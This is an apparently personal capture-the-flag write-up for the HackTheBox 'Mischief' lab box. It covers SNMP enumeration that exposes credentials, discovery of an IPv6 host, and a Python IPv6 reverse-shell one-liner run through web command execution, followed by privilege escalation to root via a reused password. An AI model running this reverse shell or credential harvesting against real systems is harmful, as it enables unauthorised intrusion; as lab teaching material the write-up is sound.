cove@home:~#

Mischief Writeup Hackthebox

Mischief Writeup

Mischief is an Insane level box on HackTheBox that relies on proper enumeration as well as knowledge of dealing with IPv6 addresses alongside normal IPv4 and the SNMP protocol.

According to the Official HackTheBox document for this box the required skills are:

  • Knowledge of Web and SNMP enumeration techniques
  • Basic knowledge of IPv6 and Linux

And the skills learned:

  • Familiarity with SNMP OIDs
  • Establishment of IPv6 rev shell

Starting with a Port Scan:

Use threader3000 to quickly scan all TCP ports:

        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.92
------------------------------------------------------------
Scanning target 10.10.10.92
Time started: 2021-08-31 15:44:19.310994
------------------------------------------------------------
Port 22 is open
Port 3366 is open


Port scan completed in 0:01:38.716523
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,3366 -sV -sC -T4 -Pn -oA 10.10.10.92 10.10.10.92
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------

We can see SSH as well as port 3366 are open

Doing a more detailed nmap scan:

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 23:11 PDT
Nmap scan report for 10.10.10.92
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
|   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
3366/tcp open  caldav  Radicale calendar and contacts server (Python BaseHTTPServer)
| http-auth: 
| HTTP/1.0 401 Unauthorized\x0D
|_  Basic realm=Test
|_http-server-header: SimpleHTTP/0.6 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.12 seconds

Sending a request to the HTTP Server Authentication is needed. For now more enumeration is needed.

Running a quick onesixtyone scan shows that SNMP is enabled

There are now two ways to approach this. Nmap scan to enumerate SNMP processes, or run a more detailed SNMPWalk to get processes and IP addresses.

nmap command:

nmap -sU -p 161 --script=snmp-processes 10.10.10.92

looking at the output of this scan we see the web server creds are inside.

|   659: 
|     Name: python
|     Path: python
|     Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/

Logging onto the webserver shows a table with credentials:

Username Password
loki godofmischiefloki
loki trickeryanddeceit

Another set of creds, but nowhere to use them. Another brick wall.

SNMP works by using Object Identifiers or OIDs. And these follow a standardized naming protocol.

http://www.net-snmp.org/docs/mibs/ip.html

Is a great resource for finding useful OIDs.

The one we want to use is 1.3.6.1.2.1.4.34.1.3 which will show us the ip address information. Running the command snmpwalk -v2c -c public 10.10.10.92 1.3.6.1.2.1.4.34.1.3 shows us more ip addresses on the system.

For me this looks like:

IP-MIB::ipAddressIfIndex.ipv4."10.10.10.92" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."10.10.10.255" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv4."127.0.0.1" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01" = INTEGER: 1
IP-MIB::ipAddressIfIndex.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:71:a4" = INTEGER: 2
IP-MIB::ipAddressIfIndex.ipv6."fe:80:00:00:00:00:00:00:02:50:56:ff:fe:b9:71:a4" = INTEGER: 2

At first it may look something like this:

iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.92 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.255 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.185.113.164 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.185.113.164 = INTEGER: 2

Which is almost indecipherable if you don’t understand the protocol.

To install this addon

sudo apt install snmp-mibs-downloader

edit /etc/snmp/snmp.conf and follow the directions in the file.

Going back to the main topic, this gives us an IPv6 address de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:71:a4. In order to do anything with this we need to make it a valid address.

dead:beef::0250:56ff:feb9:71a4

Running an IPv6 Nmap scan on this we see there is an open HTTP Server

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 23:38 PDT
Nmap scan report for dead:beef::250:56ff:feb9:71a4
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA)
|   256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA)
|_  256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info: 
|   IPv6 EUI-64: 
|     MAC address: 
|       address: 00:50:56:b9:71:a4
|_      manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.97 seconds

In order to get to the web server you must add square brackets into your web browser.

http://[dead:beef::250:56ff:feb9:71a4] should work.

Trying the creds from the other site don’t work here so a new username must be needed. Trying a common username administrator works and brings us to this page:

So we have to read the file from command execution? Wrong. Commands like ls and cat do not work so we are unable to read the file. Trying to establish a bash reverse shell does not work either. However python is running so we can get an IPv6 reverse shell with python

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<IP_v6_ADRESS",<PORT_NUMBER>,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

One thing to note, the normal kali nc will not catch the shell. Ncat is needed and can be installed easily with sudo apt install ncat

Then catch the shell with rlwrap ncat -nlvp 1337

rlwrap is something to add to netcat to enable the arrow keys to be used. More details found here: https://github.com/hanslub42/rlwrap

Checking the credentials file in lokis home directory gives us: lokiisthebestnorsegod

This can be used to ssh into loki and get the user flag.

Root:

Log into loki user, Check bash history

loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history 
nano .bash_history 
exit

New password that can be used somewhere. Maybe root?

Loki is not able to run su to check but www-data is able to.

Running su with this password from www-data gives us a root shell.

Attempting to cat the root.txt file gives nothing and says that the flag is somwhere else and we need to get a shell.

This can be found simply using find / -name root.txt